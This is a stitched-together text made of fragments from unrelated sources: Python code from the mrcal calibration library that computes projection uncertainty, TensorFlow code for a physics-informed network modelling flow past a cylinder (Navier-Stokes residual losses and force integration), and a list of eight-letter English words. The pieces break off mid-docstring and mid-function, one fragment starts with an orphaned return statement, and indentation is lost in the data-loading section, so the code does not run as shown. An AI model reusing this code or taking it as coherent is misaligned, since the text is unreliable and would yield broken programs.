        # /Nframes because I compute the mean over all the frames
        dpref_dframes = nps.clump( nps.mv(dprefallframes_dframes, -3, -2),
                                   n = -2 ) / Nframes

    _, dq_dpcam, dq_dintrinsics = \
        mrcal.project( p_cam, lensmodel, intrinsics_data,
                       get_gradients = True)

    if istate_intrinsics is not None:
        # Only the optimized slice of the intrinsics contributes to the state
        dq_dintrinsics_optimized = dq_dintrinsics[..., slice_optimized_intrinsics]
        Nintrinsics = dq_dintrinsics_optimized.shape[-1]
        dq_dpief[..., istate_intrinsics:istate_intrinsics+Nintrinsics] = \
            dq_dintrinsics_optimized

    if extrinsics_rt_fromref is not None:
        _, dpcam_drt, dpcam_dpref = \
            mrcal.transform_point_rt(extrinsics_rt_fromref, p_ref,
                                     get_gradients = True)
        dq_dpief[..., istate_extrinsics:istate_extrinsics+6] = \
            nps.matmult(dq_dpcam, dpcam_drt)
        if frames_rt_toref is not None:
            dq_dpief[..., istate_frames:istate_frames+Nframes*6] = \
                nps.matmult(dq_dpcam, dpcam_dpref, dpref_dframes)
    else:
        if frames_rt_toref is not None:
            dq_dpief[..., istate_frames:istate_frames+Nframes*6] = \
                nps.matmult(dq_dpcam, dpref_dframes)

    # Make dq_dpief use the packed state. I call "unpack_state" because the
    # state is in the denominator
    mrcal.unpack_state(dq_dpief, **optimization_inputs)

    return \
        _projection_uncertainty_make_output( factorization, Jpacked,
                                             dq_dpief, Nmeasurements_observations,
                                             observed_pixel_uncertainty,
                                             what)
def _projection_uncertainty_rotationonly( p_cam,
                                          lensmodel, intrinsics_data,
                                          extrinsics_rt_fromref, frames_rt_toref,
                                          factorization, Jpacked, optimization_inputs,
                                          istate_intrinsics, istate_extrinsics, istate_frames,
                                          slice_optimized_intrinsics,
                                          Nmeasurements_observations,
                                          observed_pixel_uncertainty,
                                          what):
    r'''Helper for projection_uncertainty()

    See docs for _projection_uncertainty_make_output() and
    projection_uncertainty()

    This function does all the work when observing points at infinity.

    Points at infinity are insensitive to translation, so everywhere the
    sibling helper uses the full rt transforms (transform_point_rt), this
    function uses ONLY the rotation components (rotate_point_r on the first 3
    elements of each rt vector). Consequently each extrinsics vector
    contributes 3 state variables (not 6), and each frame contributes only the
    3 rotational entries of its 6-element state slot.
    '''

    # Nstate: total number of variables in the optimization state vector.
    # dq_dpief accumulates d(pixel q)/d(intrinsics,extrinsics,frames state):
    # shape (..., 2, Nstate)
    Nstate = Jpacked.shape[-1]
    dq_dpief = np.zeros(p_cam.shape[:-1] + (2,Nstate), dtype=float)

    if frames_rt_toref is not None:
        Nframes = len(frames_rt_toref)

    if extrinsics_rt_fromref is not None:
        # Rotate the camera-frame direction back to the reference frame.
        # Negating the Rodrigues vector inverts the rotation
        p_ref = \
            mrcal.rotate_point_r( -extrinsics_rt_fromref[..., :3], p_cam )
    else:
        # No extrinsics: the camera sits at the reference coordinate system
        p_ref = p_cam

    if frames_rt_toref is not None:
        # The point in the coord system of all the frames. I index the frames on
        # axis -2
        p_frames = mrcal.rotate_point_r( -frames_rt_toref[...,:3],
                                         nps.dummy(p_ref,-2) )

        # I now have the observed point represented in the coordinate system of the
        # frames. This is indendent of any intrinsics-implied rotation, or anything
        # of the sort. I project this point back to pixels, through noisy estimates
        # of the frames, extrinsics and intrinsics.
        #
        # I transform each frame-represented point back to the reference coordinate
        # system, and I average out each estimate to get the one p_ref I will use. I
        # already have p_ref, so I don't actually need to compute the value; I just
        # need the gradients

        # dprefallframes_dframesr has shape (..., Nframes,3,3)
        _, \
        dprefallframes_dframesr, \
        _ = mrcal.rotate_point_r( frames_rt_toref[...,:3], p_frames,
                                  get_gradients = True)

    # Project the camera-frame point to pixels, with gradients with respect to
    # the point and the intrinsics
    _, dq_dpcam, dq_dintrinsics = \
        mrcal.project( p_cam, lensmodel, intrinsics_data,
                       get_gradients = True)

    if istate_intrinsics is not None:
        # Keep only the gradient columns for intrinsics that were actually
        # optimized, and place them at their spot in the state vector
        dq_dintrinsics_optimized = dq_dintrinsics[..., slice_optimized_intrinsics]
        Nintrinsics = dq_dintrinsics_optimized.shape[-1]
        dq_dpief[..., istate_intrinsics:istate_intrinsics+Nintrinsics] = \
            dq_dintrinsics_optimized

    if extrinsics_rt_fromref is not None:
        # Chain rule through the reference->camera rotation. Rotation-only, so
        # the extrinsics contribute 3 columns (not 6)
        _, dpcam_dr, dpcam_dpref = \
            mrcal.rotate_point_r(extrinsics_rt_fromref[...,:3], p_ref,
                                 get_gradients = True)
        dq_dpief[..., istate_extrinsics:istate_extrinsics+3] = \
            nps.matmult(dq_dpcam, dpcam_dr)

        if frames_rt_toref is not None:
            dq_dpref = nps.matmult(dq_dpcam, dpcam_dpref)
            # dprefallframes_dframesr has shape (..., Nframes,3,3)
            # Each frame occupies a 6-wide state slot; only its first 3
            # (rotation) entries get a gradient here. /Nframes because p_ref is
            # the mean of the per-frame estimates
            for i in range(Nframes):
                dq_dpief[..., istate_frames+6*i:istate_frames+6*i+3] = \
                    nps.matmult(dq_dpref, dprefallframes_dframesr[...,i,:,:]) / Nframes
    else:
        if frames_rt_toref is not None:
            # No extrinsics in the state: dq/dpref is dq/dpcam directly.
            # dprefallframes_dframesr has shape (..., Nframes,3,3)
            for i in range(Nframes):
                dq_dpief[..., istate_frames+6*i:istate_frames+6*i+3] = \
                    nps.matmult(dq_dpcam, dprefallframes_dframesr[...,i,:,:]) / Nframes

    # Make dq_dpief use the packed state. I call "unpack_state" because the
    # state is in the denominator
    mrcal.unpack_state(dq_dpief, **optimization_inputs)

    return \
        _projection_uncertainty_make_output( factorization, Jpacked,
                                             dq_dpief, Nmeasurements_observations,
                                             observed_pixel_uncertainty,
                                             what)
def projection_uncertainty( p_cam, model,
atinfinity = False,
# what we're reporting
what = 'covariance'):
r'''Compute the projection uncertainty of a camera-referenced point
This is the interface to the uncertainty computations described in
http://mrcal.secretsauce.net/uncertainty.html
SYNOPSIS
model = mrcal.cameramodel("xxx.cameramodel")
q = np.array((123., 443.))
distance = 10.0
pcam = distance * mrcal.unproject(q, *model.intrinsics(), normalize=True)
print(mrcal.projection_uncertainty(pcam,
model = model,
what = 'worstdirection-stdev'))
===> 0.5
# So if we have observed a world point at pixel coordinates q, and we know
# it's 10m out, then we know that the standard deviation of the noise of the
# pixel obsevation is 0.5 pixels, in the worst direction
After a camera model is computed via a calibration process, the model is
ultimately used in projection/unprojection operations to map between world
coordinates and projected pixel coordinates. We never know the parameters of the
model perfectly, and it is VERY useful to know the resulting uncertainty of
projection. This can be used, among other things, to
- propagate the projection noise down to whatever is using the observed pixels
to do stuff
- evaluate the quality of calibrations, to know whether a given calibration
should be accepted, or rejected
- evaluate the stability of a computed model
I quantify uncertainty by propagating expected noise on observed chessboard
corners through the optimization problem we're solving during calibration time
to the solved parameters. And then propagating the noise on the parameters
through projection.
The below derivation is double-checked via simulated noise in
test-projection-uncertainty.py
The uncertainties can be visualized with the mrcal-show-projection-uncertainty
tool.
ARGUMENTS
This function accepts an array of camera-referenced points p_cam and some
representation of parameters and uncertainties (either a single
mrcal.cameramodel object or all of
(lensmodel,intrinsics_data,extrinsics_rt_fromref,frames_rt_toref,Var_ief)). And
a few meta-parameters that describe details of the behavior. This function
broadcasts on p_cam only. We accept
- p_cam: a numpy array of shape (..., 3). This is the set of camera-coordinate
points where we're querying uncertainty. if not atinfinity: then the full 3D
coordinates of p_cam are significant, even distance to the camera. if
atinfinity: the distance to the camera is ignored.
- model: a mrcal.cameramodel object containing the intrinsics, extrinsics, frame
poses and their covariance. If this isn't given, then each of these MUST be
given in a separate argument
- lensmodel: a string describing which lens model we're using. This is something
like 'LENSMODEL_OPENCV4'. This is required if and only if model is None
- intrinsics_data: a numpy array of shape (Nintrinsics,) where Nintrinsics is
the number of parameters in the intrinsics vector for this lens model,
returned by mrcal.lensmodel_num_params(lensmodel). This is required if and only if
model is None
- extrinsics_rt_fromref: a numpy array of shape (6,) or None. This is an rt
transformation from the reference coordinate system to the camera coordinate
system. If None: the camera is at the reference coordinate system. Note that
these are the extrinsics AT CALIBRATION TIME. If we moved the camera after
calibrating, then this is OK, but for the purposes of uncertainty
computations, we care about where the camera used to be. This is required if
and only if model is None
- frames_rt_toref: a numpy array of shape (Nframes,6). These are rt
transformations from the coordinate system of each calibration object coord
system to the reference coordinate system. This array represents ALL the
observed chessboards in a calibration optimization problem. This is required
if and only if model is None
- Var_ief: a square numpy array with the intrinsics, extrinsics, frame
covariance. It is the caller's responsibility to make sure | |
'''
return nnf.NN_time_uv(x,y,t,w_u,b_u,geom,omega_0)
def fluid_v(x,y):
    '''
    Evaluate the modal (Fourier) decomposition of the vertical velocity v.

    Input : x,y TF tensors of shape [Nint,1]
    Return TF tensor of shape [1,Nint,Nmodes] with complex values
    '''
    modes_v = nnf.out_nn_modes_uv(x, y, w_v, b_v, geom)
    return modes_v
def fluid_v_t(x,y,t):
    '''
    Reconstruct the vertical velocity v at time t and position (x, y) by
    recombining the network's Fourier modes at pulsation omega_0.

    Input: x,y,t TF tensors of shape [Nint,1]
    Return TF tensor of shape [Nint,1] with real values
    '''
    v_at_t = nnf.NN_time_uv(x, y, t, w_v, b_v, geom, omega_0)
    return v_at_t
def fluid_p(x,y):
    '''
    Evaluate the modal (Fourier) decomposition of the pressure p.

    Input : x,y TF tensors of shape [Nint,1]
    Return TF tensor of shape [1,Nint,Nmodes] with complex values
    '''
    modes_p = nnf.out_nn_modes_p(x, y, w_p, b_p)
    return modes_p
def fluid_p_t(x,y,t):
    '''
    Reconstruct the pressure p at time t and position (x, y) by recombining
    the network's Fourier modes at pulsation omega_0.

    Input: x,y,t TF tensors of shape [Nint,1]
    Return TF tensor of shape [Nint,1] with real values
    '''
    p_at_t = nnf.NN_time_p(x, y, t, w_p, b_p, omega_0)
    return p_at_t
# =============================================================================
# Forces on cylinder
# =============================================================================
def force_cylinder_flatten(t):
    '''
    Compute the fluid force on the cylinder at each requested time.

    t : tf.float32 tensor shape [Nt,1]
    ----
    return
    fx_tf,fy_tf : tf.float32 tensor of shape [Nt,] containing averaged horizontal force on cylinder at time t

    The force is obtained by integrating the Newtonian stress tensor
    sigma = -p I + (1/Re)(grad u + grad u^T) dotted with the border normal,
    over Ns sample points along the cylinder boundary.
    '''
    Nt = int(t.shape[0])
    Ns = 1000 # Number of points to perform the integration over the border
    # Curvilinear abscissa s in [0,1] along the border, broadcast against the
    # times: shape [Ns,Nt]. (1+0.*t keeps the dependency on t for shape only.)
    s_cyl = tf.constant(np.linspace(0.,1.,Ns), dtype = tf.float32, shape = [Ns,1])*tf.transpose(1+0.*t)
    # s_cyl = tf.random.uniform([Ns,1], minval=0., maxval = 1., dtype = tf.float32)*tf.transpose(1+0.*t)
    # Reshaping Space x Times on a same dimension: every (s, t) pair becomes
    # one row so the fluid networks can be evaluated in a single batch
    s_cyl_r = tf.reshape(s_cyl,[Nt*Ns,1])
    x_cyl_r = tf.reshape(xbc5(s_cyl_r),[Nt*Ns,1])
    y_cyl_r = tf.reshape(ybc5(s_cyl_r),[Nt*Ns,1])
    t_cyl = (1.+0*s_cyl)*tf.transpose(t)
    t_cyl_r = tf.reshape(t_cyl,[Nt*Ns,1])
    # Computing fluid values along the border
    u = fluid_u_t(x_cyl_r,y_cyl_r,t_cyl_r)
    v = fluid_v_t(x_cyl_r,y_cyl_r,t_cyl_r)
    p = fluid_p_t(x_cyl_r,y_cyl_r,t_cyl_r)
    # Computing differentiated quantities (velocity gradients via autodiff
    # with respect to the boundary coordinates)
    u_x = tf.gradients(u, x_cyl_r)[0]
    u_y = tf.gradients(u, y_cyl_r)[0]
    u_xx = tf.gradients(u_x, x_cyl_r)[0]
    u_yy = tf.gradients(u_y, y_cyl_r)[0]
    v_x = tf.gradients(v, x_cyl_r)[0]
    v_y = tf.gradients(v, y_cyl_r)[0]
    v_xx = tf.gradients(v_x, x_cyl_r)[0]
    v_yy = tf.gradients(v_y, y_cyl_r)[0]
    # Computing normal and tangent vectors: the normal is the tangent
    # (dx/ds, dy/ds) rotated by 90 degrees, then normalized.
    # NOTE(review): which side of the border this normal points to depends on
    # the orientation of the xbc5/ybc5 parameterization — confirm against the
    # leading minus sign in the final integrals below.
    nx_base = - tf.gradients(y_cyl_r, s_cyl_r)[0]
    ny_base = tf.gradients(x_cyl_r, s_cyl_r)[0]
    normalisation = tf.sqrt(tf.square(nx_base) + tf.square(ny_base))
    nx = nx_base/normalisation
    ny = ny_base/normalisation
    # Computing local forces elements: (sigma . n) components with
    # sigma = -p I + (1/Re)(grad u + grad u^T)
    fx_tf_local = -p*nx + 2.*(1./Re)*u_x*nx + (1./Re)*(u_y+v_x)*ny
    fy_tf_local = -p*ny + 2.*(1./Re)*v_y*ny + (1./Re)*(u_y+v_x)*nx
    # Reshape to [Ns,Nt] so each column is one time instant
    fx_tf_local_r2 = tf.reshape(fx_tf_local,[Ns,Nt])
    fy_tf_local_r2 = tf.reshape(fy_tf_local,[Ns,Nt])
    # Integrating along the border for every time step: mean over the Ns
    # samples times the perimeter 2*pi*r_c
    fx_tf = -2.*np.pi*r_c*tf.reduce_mean(fx_tf_local_r2,axis=0)
    fy_tf = -2.*np.pi*r_c*tf.reduce_mean(fy_tf_local_r2,axis=0)
    return fx_tf,fy_tf
# =============================================================================
# Definition of functions for loss
# =============================================================================
def loss_int_mode(x,y):
    '''
    Squared residuals of the Navier-Stokes equations written mode-by-mode.

    Parameters
    ----------
    x,y : float 32 tensor [Nint,1]

    Returns
    -------
    Return a tf.float32 tensor of shape [Nint,1] computing squared errors on modal equations

    The fields are expanded as truncated Fourier series in time; the
    quadratic advection term therefore couples the modes. For mode k the
    products split into a convolution over l = 0..k (terms *_4a/_4b below)
    plus cross terms involving conjugate modes for l = k+1..Nmodes-1
    (terms *_5a.._5d below) — presumably relying on conjugate symmetry of
    the real-valued fields; TODO confirm against the derivation.
    '''
    # Modal amplitudes of each field: complex tensors of shape [1,Nint,Nmodes]
    all_u = fluid_u(x,y)
    all_v = fluid_v(x,y)
    all_p = fluid_p(x,y)
    # Ones of shape [1,Nint], used as grad_ys so tf.gradients returns the
    # per-sample derivative of each mode
    one = tf.transpose(0.*x + 1.)

    def customgrad(fgrad,xgrad):
        '''
        Input frgad,xgrad : tf.complex64 tensor of shape [1,Nint,N+1] and [1,Nint] resp.
        Return a tf.complex64 tensor df/dx of shape [1,Nint,N+1]
        (tf.gradients does not seem to work with complex values and with f being of order 3... But it is mainly the same thing here)
        '''
        # Differentiate real and imaginary parts separately, one mode at a
        # time, then rebuild the complex tensor
        fgrad_xgrad = [tf.complex(tf.gradients(tf.real(fgrad[:,:,k]), xgrad, grad_ys = one)[0],tf.gradients(tf.imag(fgrad[:,:,k]), xgrad, grad_ys = one)[0]) for k in range(Nmodes)]
        # Stacking the modes gives [Nmodes,Nint,1]; transpose back to
        # [1,Nint,Nmodes]
        return tf.transpose(tf.convert_to_tensor(fgrad_xgrad), perm=[2,1,0])

    # Spatial derivatives of every mode of every field
    all_u_x = customgrad(all_u,x)
    all_u_y = customgrad(all_u,y)
    all_v_x = customgrad(all_v,x)
    all_v_y = customgrad(all_v,y)
    all_p_x = customgrad(all_p,x)
    all_p_y = customgrad(all_p,y)
    all_u_xx = customgrad(all_u_x,x)
    all_u_yy = customgrad(all_u_y,y)
    all_v_xx = customgrad(all_v_x,x)
    all_v_yy = customgrad(all_v_y,y)

    # x axis momentum equation
    # Time derivative of mode k becomes multiplication by i*k*omega_0
    f_u = tf.transpose(tf.convert_to_tensor([tf.complex(0.,k*omega_0)*all_u[:,:,k] for k in range(Nmodes)]), perm=[1,2,0])
    f_u += all_p_x
    f_u += (-1./Re)*(all_u_xx + all_u_yy)
    # Advection, convolution part: sum_{l=0..k} u_l * d(u_{k-l})/dx
    f_u_4a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*all_u_x[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
    f_u += tf.transpose(tf.convert_to_tensor(f_u_4a), perm = [1,2,0])
    f_u_4b = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*all_u_y[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
    f_u += tf.transpose(tf.convert_to_tensor(f_u_4b), perm = [1,2,0])
    # Advection, conjugate cross terms: sum over l = k+1..Nmodes-1.
    # For k = Nmodes-1 the inner range is empty, so the last entry is
    # replaced by an explicit zero tensor of the right shape
    f_u_5a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*tf.conj(all_u_x[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_u_5a[-1] = f_u_5a[-2]*0.
    f_u += tf.transpose(tf.convert_to_tensor(f_u_5a), perm=[1,2,0])
    f_u_5b = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_u[:,:,l-k])*all_u_x[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_u_5b[-1] = f_u_5b[-2]*0.
    f_u += tf.transpose(tf.convert_to_tensor(f_u_5b), perm=[1,2,0])
    f_u_5c = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*tf.conj(all_u_y[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_u_5c[-1] = f_u_5c[-2]*0.
    f_u += tf.transpose(tf.convert_to_tensor(f_u_5c), perm=[1,2,0])
    f_u_5d = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_v[:,:,l-k])*all_u_y[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_u_5d[-1] = f_u_5d[-2]*0.
    f_u += tf.transpose(tf.convert_to_tensor(f_u_5d), perm=[1,2,0])
    # Sum of squared moduli over the modes
    f_u = tf.reduce_sum(nnf.square_norm(f_u), axis=2)

    # y axis Momentum equation (same structure as the x momentum above)
    f_v = tf.transpose(tf.convert_to_tensor([tf.complex(0.,k*omega_0)*all_v[:,:,k] for k in range(Nmodes)]), perm=[1,2,0])
    f_v += all_p_y
    f_v += (-1./Re)*(all_v_xx + all_v_yy)
    f_v_4a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*all_v_x[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
    f_v += tf.transpose(tf.convert_to_tensor(f_v_4a), perm = [1,2,0])
    f_v_4b = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*all_v_y[:,:,k-l] for l in range(k+1)]), axis = 0) for k in range(Nmodes)]
    f_v += tf.transpose(tf.convert_to_tensor(f_v_4b), perm = [1,2,0])
    f_v_5a = [tf.reduce_sum(tf.convert_to_tensor([all_u[:,:,l]*tf.conj(all_v_x[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_v_5a[-1] = f_v_5a[-2]*0.
    f_v += tf.transpose(tf.convert_to_tensor(f_v_5a), perm=[1,2,0])
    f_v_5b = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_u[:,:,l-k])*all_v_x[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_v_5b[-1] = f_v_5b[-2]*0. # when k = Nmodes-1, k+1 > Nmodes-1: empty sum
    f_v += tf.transpose(tf.convert_to_tensor(f_v_5b), perm=[1,2,0])
    f_v_5c = [tf.reduce_sum(tf.convert_to_tensor([all_v[:,:,l]*tf.conj(all_v_y[:,:,l-k]) for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_v_5c[-1] = f_v_5c[-2]*0.
    f_v += tf.transpose(tf.convert_to_tensor(f_v_5c), perm=[1,2,0])
    f_v_5d = [tf.reduce_sum(tf.convert_to_tensor([tf.conj(all_v[:,:,l-k])*all_v_y[:,:,l] for l in range(k+1,Nmodes)]),axis=0) for k in range(Nmodes)]
    f_v_5d[-1] = f_v_5d[-2]*0.
    f_v += tf.transpose(tf.convert_to_tensor(f_v_5d), perm=[1,2,0])
    f_v = tf.reduce_sum(nnf.square_norm(f_v), axis=2)

    # Mass conservation equation: divergence of each mode must vanish
    div_u = all_u_x + all_v_y
    div_u = tf.reduce_sum(nnf.square_norm(div_u), axis=2)

    return div_u + f_u + f_v
def loss_int_time(x,y,t):
    '''
    Squared residual of the unsteady incompressible Navier-Stokes equations
    evaluated at the given space-time collocation points.

    Parameters
    ----------
    x,y,t : tf.float 32 tensor [Nint,1]

    Returns
    -------
    [Nint,1] tensor: squared x/y momentum residuals plus squared divergence
    '''
    # Reconstruct the physical fields at the collocation points
    u = fluid_u_t(x,y,t)
    v = fluid_v_t(x,y,t)
    p = fluid_p_t(x,y,t)

    def d(f, z):
        # First derivative of f with respect to z via autodiff
        return tf.gradients(f, z)[0]

    # Time and first spatial derivatives
    u_t, v_t = d(u,t), d(v,t)
    u_x, u_y = d(u,x), d(u,y)
    v_x, v_y = d(v,x), d(v,y)
    p_x, p_y = d(p,x), d(p,y)

    # Second derivatives for the viscous terms
    u_xx, u_yy = d(u_x,x), d(u_y,y)
    v_xx, v_yy = d(v_x,x), d(v_y,y)

    # Momentum residuals and continuity residual
    f_u   = u_t + (u*u_x + v*u_y) + p_x - (1./Re)*(u_xx + u_yy)
    f_v   = v_t + (u*v_x + v*v_y) + p_y - (1./Re)*(v_xx + v_yy)
    div_u = u_x + v_y

    return tf.square(f_u)+tf.square(f_v)+tf.square(div_u)
def loss_mes(xmes,ymes,tmes,umes,vmes,pmes):
    '''
    Squared distance between the network fields and (u, v, p) measurements.

    xmes,ymes,tmes,umes,vmes,pmes : [Nmes,1] tf.float32 tensor
    Return [Nmes,1] tf.float32 tensor containing square difference to measurements
    '''
    err_u = fluid_u_t(xmes,ymes,tmes) - umes
    err_v = fluid_v_t(xmes,ymes,tmes) - vmes
    err_p = fluid_p_t(xmes,ymes,tmes) - pmes
    return tf.square(err_u) + tf.square(err_v) + tf.square(err_p)
def loss_mes_uv(xmes,ymes,tmes,umes,vmes):
    '''
    Squared distance between the network fields and velocity measurements only.

    xmes,ymes,tmes,umes,vmes : [Nmes,1] tf.float32 tensor
    Return [Nmes,1] tf.float32 tensor containing square difference to measurements of velocity
    '''
    err_u = fluid_u_t(xmes,ymes,tmes) - umes
    err_v = fluid_v_t(xmes,ymes,tmes) - vmes
    return tf.square(err_u) + tf.square(err_v)
def loss_mes_p(xmes,ymes,tmes,pmes):
    '''
    Squared distance between the network pressure field and pressure measurements.

    xmes,ymes,tmes,pmes : [Nmes,1] tf.float32 tensor
    Return [Nmes,1] tf.float32 tensor containing square difference to measurements of pressure
    '''
    err_p = fluid_p_t(xmes,ymes,tmes) - pmes
    return tf.square(err_p)
def loss_BC(s):
    '''
    No-slip boundary-condition residual on the cylinder: u = v = 0 mode by mode.

    Input s : [Nbc,1] tf.float32 tensor of curvilinear coordinates in [0,1]
    Output : [] tf.float32 real positive number
    '''
    # Map the curvilinear abscissa to border coordinates
    x_cyl = xbc5(s)
    y_cyl = ybc5(s)
    # Modal amplitudes of both velocity components on the border
    modes_u = fluid_u(x_cyl, y_cyl)
    modes_v = fluid_v(x_cyl, y_cyl)
    # Per-mode squared-modulus error, averaged over the border samples,
    # then summed over all modes
    per_mode = [nnf.square_norm(modes_u[0,:,k]) + nnf.square_norm(modes_v[0,:,k])
                for k in range(Nmodes)]
    err = tf.convert_to_tensor(per_mode)
    return tf.reduce_sum(tf.reduce_mean(err, axis=1))
# =============================================================================
# Training loss creation
# =============================================================================
# Wrap error on modal equations
Loss_int_mode_wrap = tf.reduce_mean(loss_int_mode(x_tf_int, y_tf_int))
# Wrap error on physical equations
Loss_int_time_wrap = tf.reduce_mean(loss_int_time(x_tf_int, y_tf_int, t_tf_int))
# Wrap error on (u,v,p) measurements
Loss_dense_mes = tf.reduce_mean(loss_mes(x_tf_mes,y_tf_mes,t_tf_mes,u_tf_mes,v_tf_mes,p_tf_mes))
# Wrap error on (u,v) measurements at simulated pitot probes locations.
# Two variants: one with the resynchronized time tensor, one with the raw
# (possibly desynchronized) time tensor
Loss_mes_pitot = tf.reduce_mean(loss_mes_uv(x_tf_mes_pitot,y_tf_mes_pitot,t_tf_mes_pitot_resync,u_tf_mes_pitot,v_tf_mes_pitot))
Loss_mes_pitot_desync = tf.reduce_mean(loss_mes_uv(x_tf_mes_pitot,y_tf_mes_pitot,t_tf_mes_pitot,u_tf_mes_pitot,v_tf_mes_pitot))
# Wrap error on pressure measurement around cylindre border
Loss_mes_cyl = tf.reduce_mean(loss_mes_p(x_tf_mes_cyl,y_tf_mes_cyl,t_tf_mes_cyl,p_tf_mes_cyl))
# Simulated experimental losses: pitot velocities + border pressure
Loss_mes_exp = Loss_mes_pitot + Loss_mes_cyl

# Select the measurement term according to the data regime
if args.SparseData:
    Loss_mes = Loss_mes_exp
else: # Dense measurements are used for training
    Loss_mes = Loss_dense_mes

# Select the physics term: modal (frequency-domain) residual or the
# time-domain Navier-Stokes residual
if args.LossModes:
    Loss = Loss_int_mode_wrap + Loss_mes
else: # Physical equations are used instead of modal equations
    Loss = Loss_int_time_wrap + Loss_mes

# =============================================================================
# Optimizer configuration
# =============================================================================
# L-BFGS for fine convergence, Adam (small learning rate) as the alternative
opt_LBFGS = nnf.declare_LBFGS(Loss)
opt_Adam = nnf.declare_Adam(Loss, lr=1e-5)
sess = nnf.declare_init_session()

# =============================================================================
# GPU use before loading data
# =============================================================================
print('GPU use before loading data')
GPUtil.showUtilization()
# =============================================================================
# Data set preparation
# =============================================================================
if args.SparseData:
# Let's load data only at locations defined for simulated measurements
print('Loading Sparse Data')
x_int,y_int,t_int,s_train,xmes_pitot,ymes_pitot,tmes_pitot,umes_pitot,vmes_pitot,pmes_pitot,xmes_cyl,ymes_cyl,tmes_cyl,umes_cyl,vmes_cyl,pmes_cyl,Delta_phi_np_pitot_applied = ltd.training_dict(Nmes,Nint,Nbc,filename_data,geom,Tintmax=1e2,data_selection = 'cylinder_pitot',desync=args.DesyncSparseData, multigrid=multigrid,Ngrid=Ngrid,stdNoise=stdNoise,method_int = IntSampling)
Ncyl = len(xmes_cyl)
Npitot = len(xmes_pitot)
Tmin = 400.
if multigrid:
tf_dict = []
for k in range(Ngrid):
tf_dict_temp = {x_tf_int : np.reshape(x_int[k],(Nint,1)),
y_tf_int : np.reshape(y_int[k],(Nint,1)),
t_tf_int : np.reshape(t_int[k],(Nint,1)),
s_tf : np.reshape(s_train,(Nbc,1)),
x_tf_mes_cyl : np.reshape(xmes_cyl,(Ncyl,1)),
y_tf_mes_cyl : np.reshape(ymes_cyl,(Ncyl,1)),
p_tf_mes_cyl : np.reshape(pmes_cyl,(Ncyl,1)),
t_tf_mes_cyl : np.reshape(tmes_cyl,(Ncyl,1)),
x_tf_mes_pitot : np.reshape(xmes_pitot,(Npitot,1)),
y_tf_mes_pitot : np.reshape(ymes_pitot,(Npitot,1)),
u_tf_mes_pitot : np.reshape(umes_pitot,(Npitot,1)),
v_tf_mes_pitot : np.reshape(vmes_pitot,(Npitot,1)),
p_tf_mes_pitot : np.reshape(pmes_pitot,(Npitot,1)),
t_tf_mes_pitot : np.reshape(tmes_pitot,(Npitot,1)),
| |
"falcated",
"falchion",
"falconet",
"falderal",
"falderol",
"fallaway",
"fallfish",
"fallibly",
"falloffs",
"fallouts",
"fallowed",
"faltboat",
"falterer",
"fameless",
"familism",
"famished",
"famishes",
"fanciest",
"fancying",
"fanegada",
"fanfares",
"fanfaron",
"fanfolds",
"fangless",
"fanglike",
"fanlight",
"fantails",
"fantasms",
"fantasts",
"fanworts",
"faradaic",
"faradays",
"faradise",
"faradism",
"faradize",
"farceurs",
"farfalle",
"farinhas",
"farinose",
"farmable",
"farmhand",
"farmings",
"farmwife",
"farmwork",
"farnesol",
"farolito",
"farouche",
"farriers",
"farriery",
"farrowed",
"farsides",
"fartleks",
"fasciate",
"fascicle",
"fascines",
"fascisms",
"fascitis",
"fashious",
"fastings",
"fastness",
"fastuous",
"fatalist",
"fatbacks",
"fatbirds",
"fatheads",
"fatherly",
"fathomed",
"fathomer",
"fatlings",
"fatstock",
"fattened",
"fattener",
"fattiest",
"fatwoods",
"faultier",
"faultily",
"faunally",
"faunlike",
"fauteuil",
"fauvisms",
"fauvists",
"favellas",
"favonian",
"favorers",
"favourer",
"fawniest",
"fawnlike",
"fayalite",
"fazendas",
"fealties",
"feasance",
"feasibly",
"feasters",
"feastful",
"featlier",
"febrific",
"feckless",
"feculent",
"fedayeen",
"federacy",
"federals",
"federate",
"fedexing",
"feeblest",
"feeblish",
"feedable",
"feedbags",
"feedhole",
"feedyard",
"feetless",
"feigners",
"feigning",
"feinting",
"feistier",
"feistily",
"felafels",
"feldsher",
"felinely",
"felinity",
"fellable",
"fellahin",
"fellated",
"fellates",
"fellator",
"fellness",
"fellowed",
"fellowly",
"felsites",
"felsitic",
"felspars",
"felstone",
"feltings",
"feltlike",
"feluccas",
"felworts",
"feminacy",
"feminazi",
"feminise",
"feminity",
"feminize",
"fenagled",
"fenagles",
"fencerow",
"fencible",
"fencings",
"fendered",
"fenestra",
"fenlands",
"fenniest",
"fenthion",
"fenurons",
"feoffees",
"feoffers",
"feoffing",
"feoffors",
"feracity",
"feretory",
"ferities",
"fermatas",
"ferments",
"fermiums",
"ferniest",
"ferninst",
"fernless",
"fernlike",
"ferrates",
"ferreled",
"ferreous",
"ferreted",
"ferreter",
"ferriage",
"ferrites",
"ferritic",
"ferruled",
"ferrying",
"ferryman",
"ferrymen",
"feruling",
"fervency",
"fervidly",
"fervours",
"fesswise",
"festally",
"festered",
"festoons",
"fetation",
"fetchers",
"feterita",
"fetiales",
"fetialis",
"fetiches",
"feticide",
"fetidity",
"fetlocks",
"fetology",
"fettered",
"fetterer",
"fettling",
"feudally",
"feudists",
"fevering",
"feverous",
"fewtrils",
